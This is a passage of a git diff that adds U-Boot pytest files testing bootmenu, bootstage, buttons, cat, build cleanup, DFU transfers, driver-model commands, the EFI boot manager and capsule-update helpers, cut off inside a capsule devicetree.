'bind-test-child2') + assert child_of_child2_line == '' + + #unbind the child again and check it doesn't change the tree + tree_old = ubman.run_command('dm tree') + response = ubman.run_command( + 'unbind {} {} simple_bus'.format(child2_uclass, child2_index)) + tree_new = ubman.run_command('dm tree') + + assert response == '' + assert tree_old == tree_new + + response = ubman.run_command('unbind /bind-test') + assert response == '' diff --git a/test/py/tests/test_bootmenu.py b/test/py/tests/test_bootmenu.py new file mode 100644 index 00000000000..66f3fb8a131 --- /dev/null +++ b/test/py/tests/test_bootmenu.py @@ -0,0 +1,46 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Test bootmenu""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_bootmenu') +def test_bootmenu(ubman): + """Test bootmenu + + ubman -- U-Boot console + """ + + with ubman.temporary_timeout(500): + ubman.run_command('setenv bootmenu_default 1') + ubman.run_command('setenv bootmenu_0 test 1=echo ok 1') + ubman.run_command('setenv bootmenu_1 test 2=echo ok 2') + ubman.run_command('setenv bootmenu_2 test 3=echo ok 3') + ubman.run_command('bootmenu 2', wait_for_prompt=False) + for i in ('U-Boot Boot Menu', 'test 1', 'test 2', 'test 3', 'autoboot'): + ubman.p.expect([i]) + # Press enter key to execute default entry + response = ubman.run_command(cmd='\x0d', wait_for_echo=False, send_nl=False) + assert 'ok 2' in response + ubman.run_command('bootmenu 2', wait_for_prompt=False) + ubman.p.expect(['autoboot']) + # Press up key to select prior entry followed by the enter key + response = ubman.run_command(cmd='\x1b\x5b\x41\x0d', wait_for_echo=False, + send_nl=False) + assert 'ok 1' in response + ubman.run_command('bootmenu 2', wait_for_prompt=False) + ubman.p.expect(['autoboot']) + # Press down key to select next entry followed by the enter key + response = ubman.run_command(cmd='\x1b\x5b\x42\x0d', wait_for_echo=False, + send_nl=False) + assert 'ok 3' in response + ubman.run_command('bootmenu 2; echo rc:$?', wait_for_prompt=False) + ubman.p.expect(['autoboot']) + # Press the escape key + response = ubman.run_command(cmd='\x1b', wait_for_echo=False, send_nl=False) + assert 'ok' not in response + assert 'rc:0' in response + ubman.run_command('setenv bootmenu_default') + ubman.run_command('setenv bootmenu_0') + ubman.run_command('setenv bootmenu_1') + ubman.run_command('setenv bootmenu_2') diff --git a/test/py/tests/test_bootstage.py b/test/py/tests/test_bootstage.py new file mode 100644 index 00000000000..379c1cae6dd --- /dev/null +++ b/test/py/tests/test_bootstage.py @@ -0,0 +1,62 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest + +""" +Test the bootstage command. + +It is used for checking the boot progress and timing by printing the bootstage +report, stashes the data into memory and unstashes the data from memory. + +Note: This test relies on boardenv_* containing configuration values to define +the data size, memory address, and bootstage magic address (defined in +common/bootstage.c). Without this, bootstage stash and unstash tests will be +automatically skipped. + +For example: +env__bootstage_cmd_file = { + 'addr': 0x200000, + 'size': 0x1000, + 'bootstage_magic_addr': 0xb00757a3, +} +""" + +@pytest.mark.buildconfigspec('bootstage') +@pytest.mark.buildconfigspec('cmd_bootstage') +def test_bootstage_report(ubman): + output = ubman.run_command('bootstage report') + assert 'Timer summary in microseconds' in output + assert 'Accumulated time:' in output + assert 'dm_r' in output + +@pytest.mark.buildconfigspec('bootstage') +@pytest.mark.buildconfigspec('cmd_bootstage') +@pytest.mark.buildconfigspec('bootstage_stash') +def test_bootstage_stash_and_unstash(ubman): + f = ubman.config.env.get('env__bootstage_cmd_file', None) + if not f: + pytest.skip('No bootstage environment file is defined') + + addr = f.get('addr') + size = f.get('size') + bootstage_magic = f.get('bootstage_magic_addr') + expected_text = 'dm_r' + + ubman.run_command('bootstage stash %x %x' % (addr, size)) + output = ubman.run_command('echo $?') + assert output.endswith('0') + + output = ubman.run_command('md %x 100' % addr) + + # Check BOOTSTAGE_MAGIC address at 4th byte address + assert '0x' + output.split('\n')[0].split()[4] == hex(bootstage_magic) + + # Check expected string in last column of output + output_last_col = ''.join([i.split()[-1] for i in output.split('\n')]) + assert expected_text in output_last_col + + # Check that unstash works as expected + ubman.run_command('bootstage unstash %x %x' % (addr, size)) + output = ubman.run_command('echo $?') + assert output.endswith('0') diff --git a/test/py/tests/test_button.py b/test/py/tests/test_button.py new file mode 100644 index 00000000000..f0d85be896d --- /dev/null +++ b/test/py/tests/test_button.py @@ -0,0 +1,37 @@ +# SPDX-License-Identifier: GPL-2.0+ + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_button') +def test_button_list(ubman): + """Test listing buttons""" + + response = ubman.run_command('button list; echo rc:$?') + assert('button1' in response) + assert('button2' in response) + assert('rc:0' in response) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_button') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_button_return_code(ubman): + """Test correct reporting of the button status + + The sandbox gpio driver reports the last output value as input value. + We can use this in our test to emulate different input statuses. + """ + + ubman.run_command('gpio set a3; gpio input a3'); + response = ubman.run_command('button button1; echo rc:$?') + assert('on' in response) + assert('rc:0' in response) + + ubman.run_command('gpio clear a3; gpio input a3'); + response = ubman.run_command('button button1; echo rc:$?') + assert('off' in response) + assert('rc:1' in response) + + response = ubman.run_command('button nonexistent-button; echo rc:$?') + assert('not found' in response) + assert('rc:1' in response) diff --git a/test/py/tests/test_cat/conftest.py b/test/py/tests/test_cat/conftest.py new file mode 100644 index 00000000000..320e7ebd295 --- /dev/null +++ b/test/py/tests/test_cat/conftest.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for cat command test +""" + +import os +import shutil +from subprocess import check_call, CalledProcessError +import pytest + +@pytest.fixture(scope='session') +def cat_data(u_boot_config): + """Set up a file system to be used in cat tests + + Args: + u_boot_config -- U-Boot configuration. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_cat' + image_path = u_boot_config.persistent_data_dir + '/cat.img' + + try: + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/hello', 'w', encoding = 'ascii') as file: + file.write('hello world\n') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + yield image_path + except CalledProcessError: + pytest.skip('Setup failed') + finally: + shutil.rmtree(mnt_point) + if os.path.exists(image_path): + os.remove(image_path) diff --git a/test/py/tests/test_cat/test_cat.py b/test/py/tests/test_cat/test_cat.py new file mode 100644 index 00000000000..883803fece7 --- /dev/null +++ b/test/py/tests/test_cat/test_cat.py @@ -0,0 +1,20 @@ +# SPDX-License-Identifier: GPL-2.0+ + +""" Unit test for cat command +""" + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_cat') +def test_cat(ubman, cat_data): + """ Unit test for cat + + Args: + ubman -- U-Boot console + cat_data -- Path to the disk image used for testing. + """ + response = ubman.run_command_list([ + f'host bind 0 {cat_data}', + 'cat host 0 hello']) + assert 'hello world' in response diff --git a/test/py/tests/test_cleanup_build.py b/test/py/tests/test_cleanup_build.py new file mode 100644 index 00000000000..aca90cb1107 --- /dev/null +++ b/test/py/tests/test_cleanup_build.py @@ -0,0 +1,110 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2023 Tobias Deiminger <tdmg@linutronix.de> + +"""Test for unexpected leftovers after make clean""" + +import itertools +import os +import pathlib +import shutil +import sys + +import pytest + +# pylint: disable=redefined-outer-name + + +@pytest.fixture +def tmp_copy_of_builddir(u_boot_config, tmp_path): + """For each test, provide a temporary copy of the initial build directory.""" + if os.path.realpath(u_boot_config.source_dir) == os.path.realpath( + u_boot_config.build_dir + ): + pytest.skip("Leftover detection requires out of tree build.") + return None + shutil.copytree( + u_boot_config.build_dir, + tmp_path, + symlinks=True, + dirs_exist_ok=True, + ) + return tmp_path + + +@pytest.fixture(scope="module") +def run_make(u_boot_log): + """Provide function to run and log make without connecting to u-boot console.""" + runner = u_boot_log.get_runner("make", sys.stdout) + + def _run_make(build_dir, target): + cmd = ["make", f"O={build_dir}", target] + runner.run(cmd) + + yield _run_make + runner.close() + + +@pytest.fixture(scope="module") +def most_generated_files(): + """Path.glob style patterns to describe what should be removed by 'make clean'.""" + return ( + "**/*.c", + "**/*.dtb", + "**/*.dtbo", + "**/*.o", + "**/*.py", + "**/*.pyc", + "**/*.so", + "**/*.srec", + "u-boot*", + "[svt]pl/u-boot*", + ) + + +@pytest.fixture(scope="module") +def all_generated_files(most_generated_files): + """Path.glob style patterns to describe what should be removed by 'make mrproper'.""" + return most_generated_files + (".config", "**/*.h") + + +def find_files(search_dir, include_patterns, exclude_dirs=None): + """Find files matching include_patterns, unless it's in one of exclude_dirs. + + include_patterns -- Path.glob style pattern relative to search dir + exclude_dir -- directories to exclude, expected relative to search dir + """ + matches = [] + exclude_dirs = [] if exclude_dirs is None else exclude_dirs + for abs_path in itertools.chain.from_iterable( + pathlib.Path(search_dir).glob(pattern) for pattern in include_patterns + ): + if abs_path.is_dir(): + continue + rel_path = pathlib.Path(os.path.relpath(abs_path, search_dir)) + if not any( + rel_path.is_relative_to(exclude_dir) for exclude_dir in exclude_dirs + ): + matches.append(rel_path) + return matches + + +def test_clean(run_make, tmp_copy_of_builddir, most_generated_files): + """Test if 'make clean' deletes most generated files.""" + run_make(tmp_copy_of_builddir, "clean") + leftovers = find_files( + tmp_copy_of_builddir, + most_generated_files, + exclude_dirs=["scripts", "test/overlay"], + ) + assert not leftovers, f"leftovers: {', '.join(map(str, leftovers))}" + + +def test_mrproper(run_make, tmp_copy_of_builddir, all_generated_files): + """Test if 'make mrproper' deletes current configuration and all generated files.""" + run_make(tmp_copy_of_builddir, "mrproper") + leftovers = find_files( + tmp_copy_of_builddir, + all_generated_files, + exclude_dirs=["test/overlay"], + ) + assert not leftovers, f"leftovers: {', '.join(map(str, leftovers))}" diff --git a/test/py/tests/test_dfu.py b/test/py/tests/test_dfu.py new file mode 100644 index 00000000000..7d6f41db7fb --- /dev/null +++ b/test/py/tests/test_dfu.py @@ -0,0 +1,320 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +# Test U-Boot's "dfu" command. The test starts DFU in U-Boot, waits for USB +# device enumeration on the host, executes dfu-util multiple times to test +# various transfer sizes, many of which trigger USB driver edge cases, and +# finally aborts the "dfu" command in U-Boot. + +import os +import os.path +import pytest +import utils + +""" +Note: This test relies on: + +a) boardenv_* to contain configuration values to define which USB ports are +available for testing. Without this, this test will be automatically skipped. +For example: + +env__usb_dev_ports = ( + { + 'fixture_id': 'micro_b', + 'tgt_usb_ctlr': '0', + 'host_usb_dev_node': '/dev/usbdev-p2371-2180', + # This parameter is optional /if/ you only have a single board + # attached to your host at a time. + 'host_usb_port_path': '3-13', + }, +) + +# Optional entries (required only when 'alt_id_test_file' and +# 'alt_id_dummy_file' are specified). +test_file_name = '/dfu_test.bin' +dummy_file_name = '/dfu_dummy.bin' +# Above files are used to generate proper 'alt_info' entry +'alt_info': '/%s ext4 0 2;/%s ext4 0 2' % (test_file_name, dummy_file_name), + +env__dfu_configs = ( + # eMMC, partition 1 + { + 'fixture_id': 'emmc', + 'alt_info': '/dfu_test.bin ext4 0 1;/dfu_dummy.bin ext4 0 1', + 'cmd_params': 'mmc 0', + # This value is optional. + # If present, it specified the set of transfer sizes tested. + # If missing, a default list of sizes will be used, which covers + # various useful corner cases. + # Manually specifying test sizes is useful if you wish to test 4 DFU + # configurations, but don't want to test every single transfer size + # on each, to avoid bloating the overall time taken by testing. + 'test_sizes': (63, 64, 65), + # This value is optional. + # The name of the environment variable that the the dfu command reads + # alt info from. If unspecified, this defaults to dfu_alt_info, which is + # valid for most systems. Some systems use a different variable name. + # One example is the Odroid XU3, which automatically generates + # $dfu_alt_info, each time the dfu command is run, by concatenating + # $dfu_alt_boot and $dfu_alt_system. + 'alt_info_env_name': 'dfu_alt_system', + # This value is optional. + # For boards which require the 'test file' alt setting number other than + # default (0) it is possible to specify exact file name to be used as + # this parameter. + 'alt_id_test_file': test_file_name, + # This value is optional. + # For boards which require the 'dummy file' alt setting number other + # than default (1) it is possible to specify exact file name to be used + # as this parameter. + 'alt_id_dummy_file': dummy_file_name, + }, +) + +b) udev rules to set permissions on devices nodes, so that sudo is not +required. For example: + +ACTION=="add", SUBSYSTEM=="block", SUBSYSTEMS=="usb", KERNELS=="3-13", MODE:="666" + +(You may wish to change the group ID instead of setting the permissions wide +open. All that matters is that the user ID running the test can access the +device.) + +c) An optional udev rule to give you a persistent value to use in +host_usb_dev_node. For example: + +IMPORT{builtin}="path_id" +ENV{ID_PATH}=="?*", ENV{.ID_PORT}=="", SYMLINK+="bus/usb/by-path/$env{ID_PATH}" +ENV{ID_PATH}=="?*", ENV{.ID_PORT}=="?*", SYMLINK+="bus/usb/by-path/$env{ID_PATH}-port$env{.ID_PORT}" +""" + +# The set of file sizes to test. These values trigger various edge-cases such +# as one less than, equal to, and one greater than typical USB max packet +# sizes, and similar boundary conditions. +test_sizes_default = ( + 64 - 1, + 64, + 64 + 1, + 128 - 1, + 128, + 128 + 1, + 960 - 1, + 960, + 960 + 1, + 4096 - 1, + 4096, + 4096 + 1, + 1024 * 1024 - 1, + 1024 * 1024, + 8 * 1024 * 1024, +) + +first_usb_dev_port = None + +@pytest.mark.buildconfigspec('cmd_dfu') +@pytest.mark.requiredtool('dfu-util') +def test_dfu(ubman, env__usb_dev_port, env__dfu_config): + """Test the "dfu" command; the host system must be able to enumerate a USB + device when "dfu" is running, various DFU transfers are tested, and the + USB device must disappear when "dfu" is aborted. + + Args: + ubman: A U-Boot console connection. + env__usb_dev_port: The single USB device-mode port specification on + which to run the test. See the file-level comment above for + details of the format. + env__dfu_config: The single DFU (memory region) configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + def start_dfu(): + """Start U-Boot's dfu shell command. + + This also waits for the host-side USB enumeration process to complete. + + Args: + None. + + Returns: + Nothing. + """ + + utils.wait_until_file_open_fails( + env__usb_dev_port['host_usb_dev_node'], True) + fh = utils.attempt_to_open_file( + env__usb_dev_port['host_usb_dev_node']) + if fh: + fh.close() + raise Exception('USB device present before dfu command invoked') + + ubman.log.action( + 'Starting long-running U-Boot dfu shell command') + + dfu_alt_info_env = env__dfu_config.get('alt_info_env_name', \ + 'dfu_alt_info') + + cmd = 'setenv "%s" "%s"' % (dfu_alt_info_env, + env__dfu_config['alt_info']) + ubman.run_command(cmd) + + cmd = 'dfu 0 ' + env__dfu_config['cmd_params'] + ubman.run_command(cmd, wait_for_prompt=False) + ubman.log.action('Waiting for DFU USB device to appear') + fh = utils.wait_until_open_succeeds( + env__usb_dev_port['host_usb_dev_node']) + fh.close() + + def stop_dfu(ignore_errors): + """Stop U-Boot's dfu shell command from executing. + + This also waits for the host-side USB de-enumeration process to + complete. + + Args: + ignore_errors: Ignore any errors. This is useful if an error has + already been detected, and the code is performing best-effort + cleanup. In this case, we do not want to mask the original + error by "honoring" any new errors. + + Returns: + Nothing. + """ + + try: + ubman.log.action( + 'Stopping long-running U-Boot dfu shell command') + ubman.ctrlc() + ubman.log.action( + 'Waiting for DFU USB device to disappear') + utils.wait_until_file_open_fails( + env__usb_dev_port['host_usb_dev_node'], ignore_errors) + except: + if not ignore_errors: + raise + + def run_dfu_util(alt_setting, fn, up_dn_load_arg): + """Invoke dfu-util on the host. + + Args: + alt_setting: The DFU "alternate setting" identifier to interact + with. + fn: The host-side file name to transfer. + up_dn_load_arg: '-U' or '-D' depending on whether a DFU upload or + download operation should be performed. + + Returns: + Nothing. + """ + + cmd = ['dfu-util', '-a', alt_setting, up_dn_load_arg, fn] + if 'host_usb_port_path' in env__usb_dev_port: + cmd += ['-p', env__usb_dev_port['host_usb_port_path']] + utils.run_and_log(ubman, cmd) + ubman.wait_for('Ctrl+C to exit ...') + + def dfu_write(alt_setting, fn): + """Write a file to the target board using DFU. + + Args: + alt_setting: The DFU "alternate setting" identifier to interact + with. + fn: The host-side file name to transfer. + + Returns: + Nothing. + """ + + run_dfu_util(alt_setting, fn, '-D') + + def dfu_read(alt_setting, fn): + """Read a file from the target board using DFU. + + Args: + alt_setting: The DFU "alternate setting" identifier to interact + with. + fn: The host-side file name to transfer. + + Returns: + Nothing. + """ + + # dfu-util fails reads/uploads if the host file already exists + if os.path.exists(fn): + os.remove(fn) + run_dfu_util(alt_setting, fn, '-U') + + def dfu_write_read_check(size): + """Test DFU transfers of a specific size of data + + This function first writes data to the board then reads it back and + compares the written and read back data. Measures are taken to avoid + certain types of false positives. + + Args: + size: The data size to test. + + Returns: + Nothing. + """ + + test_f = utils.PersistentRandomFile(ubman, + 'dfu_%d.bin' % size, size) + readback_fn = ubman.config.result_dir + '/dfu_readback.bin' + + ubman.log.action('Writing test data to DFU primary ' + + 'altsetting') + dfu_write(alt_setting_test_file, test_f.abs_fn) + + ubman.log.action('Writing dummy data to DFU secondary ' + + 'altsetting to clear DFU buffers') + dfu_write(alt_setting_dummy_file, dummy_f.abs_fn) + + ubman.log.action('Reading DFU primary altsetting for ' + + 'comparison') + dfu_read(alt_setting_test_file, readback_fn) + + ubman.log.action('Comparing written and read data') + written_hash = test_f.content_hash + read_back_hash = utils.md5sum_file(readback_fn, size) + assert(written_hash == read_back_hash) + + # This test may be executed against multiple USB ports. The test takes a + # long time, so we don't want to do the whole thing each time. Instead, + # execute the full test on the first USB port, and perform a very limited + # test on other ports. In the limited case, we solely validate that the + # host PC can enumerate the U-Boot USB device. + global first_usb_dev_port + if not first_usb_dev_port: + first_usb_dev_port = env__usb_dev_port + if env__usb_dev_port == first_usb_dev_port: + sizes = env__dfu_config.get('test_sizes', test_sizes_default) + else: + sizes = [] + + dummy_f = utils.PersistentRandomFile(ubman, + 'dfu_dummy.bin', 1024) + + alt_setting_test_file = env__dfu_config.get('alt_id_test_file', '0') + alt_setting_dummy_file = env__dfu_config.get('alt_id_dummy_file', '1') + + ignore_cleanup_errors = True + try: + start_dfu() + + ubman.log.action( + 'Overwriting DFU primary altsetting with dummy data') + dfu_write(alt_setting_test_file, dummy_f.abs_fn) + + for size in sizes: + with ubman.log.section('Data size %d' % size): + dfu_write_read_check(size) + # Make the status of each sub-test obvious. If the test didn't + # pass, an exception was thrown so this code isn't executed. + ubman.log.status_pass('OK') + ignore_cleanup_errors = False + finally: + stop_dfu(ignore_cleanup_errors) diff --git a/test/py/tests/test_dm.py b/test/py/tests/test_dm.py new file mode 100644 index 00000000000..f4c2ccd1101 --- /dev/null +++ b/test/py/tests/test_dm.py @@ -0,0 +1,84 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Sean Anderson + +import pytest + +@pytest.mark.buildconfigspec('cmd_dm') +def test_dm_compat(ubman): + """Test that each driver in `dm tree` is also listed in `dm compat`.""" + response = ubman.run_command('dm tree') + driver_index = response.find('Driver') + assert driver_index != -1 + drivers = (line[driver_index:].split()[0] + for line in response[:-1].split('\n')[2:]) + + response = ubman.run_command('dm compat') + bad_drivers = set() + for driver in drivers: + if not driver in response: + bad_drivers.add(driver) + assert not bad_drivers + + # check sorting - output looks something like this: + # testacpi 0 [ ] testacpi_drv |-- acpi-test + # testacpi 1 [ ] testacpi_drv | `-- child + # pci_emul_p 1 [ ] pci_emul_parent_drv |-- pci-emul2 + # pci_emul 5 [ ] sandbox_swap_case_em | `-- emul2@1f,0 + + # The number of '| ' and '--' matches indicate the indent level. We start + # checking sorting only after UCLASS_AXI_EMUL after which the names should + # be sorted. + + response = ubman.run_command('dm tree -s') + lines = response.split('\n')[2:] + stack = [] # holds where we were up to at the previous indent level + prev = '' # uclass name of previous line + start = False + for line in lines: + indent = line.count('| ') + ('--' in line) + cur = line.split()[0] + if not start: + if cur != 'axi_emul': + continue + start = True + + # Handle going up or down an indent level + if indent > len(stack): + stack.append(prev) + prev = '' + elif indent < len(stack): + prev = stack.pop() + + # Check that the current uclass name is not alphabetically before the + # previous one + if 'emul' not in cur and cur < prev: + print('indent', cur >= prev, indent, prev, cur, stack) + assert cur >= prev + prev = cur + + +@pytest.mark.buildconfigspec('cmd_dm') +def test_dm_drivers(ubman): + """Test that each driver in `dm compat` is also listed in `dm drivers`.""" + response = ubman.run_command('dm compat') + drivers = (line[:20].rstrip() for line in response[:-1].split('\n')[2:]) + response = ubman.run_command('dm drivers') + for driver in drivers: + assert driver in response + +@pytest.mark.buildconfigspec('cmd_dm') +def test_dm_static(ubman): + """Test that each driver in `dm static` is also listed in `dm drivers`.""" + response = ubman.run_command('dm static') + drivers = (line[:25].rstrip() for line in response[:-1].split('\n')[2:]) + response = ubman.run_command('dm drivers') + for driver in drivers: + assert driver in response + +@pytest.mark.buildconfigspec("cmd_dm") +def test_dm_uclass(ubman): + response = ubman.run_command("dm uclass") + +@pytest.mark.buildconfigspec("cmd_dm") +def test_dm_devres(ubman): + response = ubman.run_command("dm devres") diff --git a/test/py/tests/test_efi_bootmgr/conftest.py b/test/py/tests/test_efi_bootmgr/conftest.py new file mode 100644 index 00000000000..0eca025058e --- /dev/null +++ b/test/py/tests/test_efi_bootmgr/conftest.py @@ -0,0 +1,38 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for UEFI bootmanager test.""" + +import os +import shutil +from subprocess import check_call +import pytest + +@pytest.fixture(scope='session') +def efi_bootmgr_data(u_boot_config): + """Set up a file system to be used in UEFI bootmanager tests. + + Args: + u_boot_config -- U-Boot configuration. + + Return: + A path to disk image to be used for testing + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_bootmgr' + image_path = u_boot_config.persistent_data_dir + '/efi_bootmgr.img' + + shutil.rmtree(mnt_point, ignore_errors=True) + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/initrd-1.img', 'w', encoding = 'ascii') as file: + file.write("initrd 1") + + with open(mnt_point + '/initrd-2.img', 'w', encoding = 'ascii') as file: + file.write("initrd 2") + + shutil.copyfile(u_boot_config.build_dir + '/lib/efi_loader/initrddump.efi', + mnt_point + '/initrddump.efi') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + return image_path diff --git a/test/py/tests/test_efi_bootmgr/test_efi_bootmgr.py b/test/py/tests/test_efi_bootmgr/test_efi_bootmgr.py new file mode 100644 index 00000000000..8800e9de5b4 --- /dev/null +++ b/test/py/tests/test_efi_bootmgr/test_efi_bootmgr.py @@ -0,0 +1,44 @@ +# SPDX-License-Identifier: GPL-2.0+ +""" Unit test for UEFI bootmanager +""" + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_bootefi_bootmgr') +@pytest.mark.singlethread +def test_efi_bootmgr(ubman, efi_bootmgr_data): + """ Unit test for UEFI bootmanager + The efidebug command is used to set up UEFI load options. + The bootefi bootmgr loads initrddump.efi as a payload. + The crc32 of the loaded initrd.img is checked + + Args: + ubman -- U-Boot console + efi_bootmgr_data -- Path to the disk image used for testing. + """ + ubman.run_command(cmd = f'host bind 0 {efi_bootmgr_data}') + + ubman.run_command(cmd = 'efidebug boot add ' \ + '-b 0001 label-1 host 0:1 initrddump.efi ' \ + '-i host 0:1 initrd-1.img -s nocolor') + ubman.run_command(cmd = 'efidebug boot dump') + ubman.run_command(cmd = 'efidebug boot order 0001') + ubman.run_command(cmd = 'bootefi bootmgr') + response = ubman.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x181464af' in response + ubman.run_command(cmd = 'exit', wait_for_echo=False) + + ubman.run_command(cmd = 'efidebug boot add ' \ + '-B 0002 label-2 host 0:1 initrddump.efi ' \ + '-I host 0:1 initrd-2.img -s nocolor') + ubman.run_command(cmd = 'efidebug boot dump') + ubman.run_command(cmd = 'efidebug boot order 0002') + ubman.run_command(cmd = 'bootefi bootmgr') + response = ubman.run_command(cmd = 'load', wait_for_echo=False) + assert 'crc32: 0x811d3515' in response + ubman.run_command(cmd = 'exit', wait_for_echo=False) + + ubman.run_command(cmd = 'efidebug boot rm 0001') + ubman.run_command(cmd = 'efidebug boot rm 0002') diff --git a/test/py/tests/test_efi_capsule/capsule_common.py b/test/py/tests/test_efi_capsule/capsule_common.py new file mode 100644 index 00000000000..40b3fca809e --- /dev/null +++ b/test/py/tests/test_efi_capsule/capsule_common.py @@ -0,0 +1,142 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2023, Linaro Limited + + +"""Common function for UEFI capsule test.""" + +from capsule_defs import CAPSULE_DATA_DIR, CAPSULE_INSTALL_DIR + +def capsule_setup(ubman, disk_img, osindications): + """setup the test + + Args: + ubman -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + osindications -- String of osindications value. + """ + ubman.run_command_list([ + f'host bind 0 {disk_img}', + 'printenv -e PlatformLangCodes', # workaround for terminal size determination + 'efidebug boot add -b 1 TEST host 0:1 /helloworld.efi', + 'efidebug boot order 1', + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"']) + + if osindications is None: + ubman.run_command('env set -e OsIndications') + else: + ubman.run_command(f'env set -e -nv -bs -rt OsIndications ={osindications}') + + ubman.run_command('env save') + +def init_content(ubman, target, filename, expected): + """initialize test content + + Args: + ubman -- A console connection to U-Boot. + target -- Target address to place the content. + filename -- File name of the content. + expected -- Expected string of the content. + """ + output = ubman.run_command_list([ + 'sf probe 0:0', + f'fatload host 0:1 4000000 {CAPSULE_DATA_DIR}/{filename}', + f'sf write 4000000 {target} 10', + 'sf read 5000000 100000 10', + 'md.b 5000000 10']) + assert expected in ''.join(output) + +def place_capsule_file(ubman, filenames): + """place the capsule file + + Args: + ubman -- A console connection to U-Boot. + filenames -- File name array of the target capsule files. + """ + for name in filenames: + ubman.run_command_list([ + f'fatload host 0:1 4000000 {CAPSULE_DATA_DIR}/{name}', + f'fatwrite host 0:1 4000000 {CAPSULE_INSTALL_DIR}/{name} $filesize']) + + output = ubman.run_command(f'fatls host 0:1 {CAPSULE_INSTALL_DIR}') + for name in filenames: + assert name in ''.join(output) + +def exec_manual_update(ubman, disk_img, filenames, need_reboot = True): + """execute capsule update manually + + Args: + ubman -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + filenames -- File name array of the target capsule files. + need_reboot -- Flag indicates whether system reboot is required. + """ + # make sure that dfu_alt_info exists even persistent variables + # are not available. + output = ubman.run_command_list([ + 'env set dfu_alt_info ' + '"sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + f'host bind 0 {disk_img}', + f'fatls host 0:1 {CAPSULE_INSTALL_DIR}']) + for name in filenames: + assert name in ''.join(output) + + # need to run uefi command to initiate capsule handling + ubman.run_command( + 'env print -e Capsule0000', wait_for_reboot = need_reboot) + +def check_file_removed(ubman, disk_img, filenames): + """check files are removed + + Args: + ubman -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + filenames -- File name array of the target capsule files. + """ + output = ubman.run_command_list([ + f'host bind 0 {disk_img}', + f'fatls host 0:1 {CAPSULE_INSTALL_DIR}']) + for name in filenames: + assert name not in ''.join(output) + +def check_file_exist(ubman, disk_img, filenames): + """check files exist + + Args: + ubman -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + filenames -- File name array of the target capsule files. + """ + output = ubman.run_command_list([ + f'host bind 0 {disk_img}', + f'fatls host 0:1 {CAPSULE_INSTALL_DIR}']) + for name in filenames: + assert name in ''.join(output) + +def verify_content(ubman, target, expected): + """verify the content + + Args: + ubman -- A console connection to U-Boot. + target -- Target address to verify. + expected -- Expected string of the content. + """ + output = ubman.run_command_list([ + 'sf probe 0:0', + f'sf read 4000000 {target} 10', + 'md.b 4000000 10']) + assert expected in ''.join(output) + +def do_reboot_dtb_specified(u_boot_config, ubman, dtb_filename): + """do reboot with specified DTB + + Args: + u_boot_config -- U-boot configuration. + ubman -- A console connection to U-Boot. + dtb_filename -- DTB file name. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_capsule' + ubman.config.dtb = mnt_point + CAPSULE_DATA_DIR \ + + f'/{dtb_filename}' + ubman.restart_uboot() diff --git a/test/py/tests/test_efi_capsule/capsule_defs.py b/test/py/tests/test_efi_capsule/capsule_defs.py new file mode 100644 index 00000000000..3cc695e29b5 --- /dev/null +++ b/test/py/tests/test_efi_capsule/capsule_defs.py @@ -0,0 +1,12 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Directoreis used for authentication and capsule tests.""" + +# Directories +CAPSULE_DATA_DIR = '/EFI/CapsuleTestData' +CAPSULE_INSTALL_DIR = '/EFI/UpdateCapsule' + +# v1.5.1 or earlier of efitools has a bug in sha256 calculation, and +# you need build a newer version on your own. +# The path must terminate with '/' if it is not null. +EFITOOLS_PATH = '' diff --git a/test/py/tests/test_efi_capsule/capsule_gen_binman.dts b/test/py/tests/test_efi_capsule/capsule_gen_binman.dts new file mode 100644 index 00000000000..1a62c260474 --- /dev/null +++ b/test/py/tests/test_efi_capsule/capsule_gen_binman.dts @@ -0,0 +1,168 @@ +// SPDX-License-Identifier: GPL-2.0+ +/* + * Devicetree for capsule generation through binman + */ + +/dts-v1/; + +#include <sandbox_efi_capsule.h> + +/ { + binman: binman { + multiple-images; + }; +}; + +&binman { + itb { + filename = UBOOT_FIT_IMAGE; + + fit { + description = "Automatic U-Boot environment update"; + #address-cells = <2>; + + images { + u-boot-bin { + description = "U-Boot binary on SPI Flash"; + compression = "none"; + type = "firmware"; + arch = "sandbox"; + load = <0>; + text { + text = "u-boot:New"; + }; + + hash-1 { + algo = "sha1"; + }; + }; + u-boot-env { + description = "U-Boot environment on SPI Flash"; + compression = "none"; + type = "firmware"; + arch = "sandbox"; 